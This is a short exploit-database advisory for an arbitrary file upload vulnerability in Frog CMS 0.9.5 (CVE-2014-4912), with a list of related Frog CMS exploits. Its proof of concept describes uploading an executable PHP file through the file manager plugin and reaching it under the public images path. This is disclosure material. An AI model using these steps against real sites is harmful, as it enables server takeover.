Exploit Title: Arbitrary File Upload in Frog CMS 0.9.5 Date : 2014-07-07 Exploit Author : Javid Hussain Vendor Homepage : http://www.madebyfrog.com # Exploit-DB Note: All authenticated users can upload files. If the file # does not have execute permissions the CMS allows users to change them. # No need to be authenticated to trigger uploaded files. There is a possibility to upload arbitrary file in Frog CMS latest version 0.9.5 POC: The vulnerability exist because of the filemanager plugin is not properly verifying the extension of uploaded files. Go to http://localhost/frog_095/admin/?/plugin/file_manager/images Upload an executable php file Go to http://localhost/Frog/frog_095/public/images/ for verification.
Related ExploitsTrying to match CVEs (1): CVE-2014-4912
Trying to match OSVDBs (1): 108949
Trying to match setup file: 4db564e2065718077b277b8c1a4706e5
Other Possible E-DB Search Terms: Frog CMS 0.9.5, Frog CMS
|2009-12-13||Frog CMS 0.9.5 - Cross-Site Request Forgery||Milos Zivan...|
|2010-07-11||Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities||10n1z3d|
|2010-11-25||Frog CMS 0.9.5 - Multiple Vulnerabilities||High-Tech B...|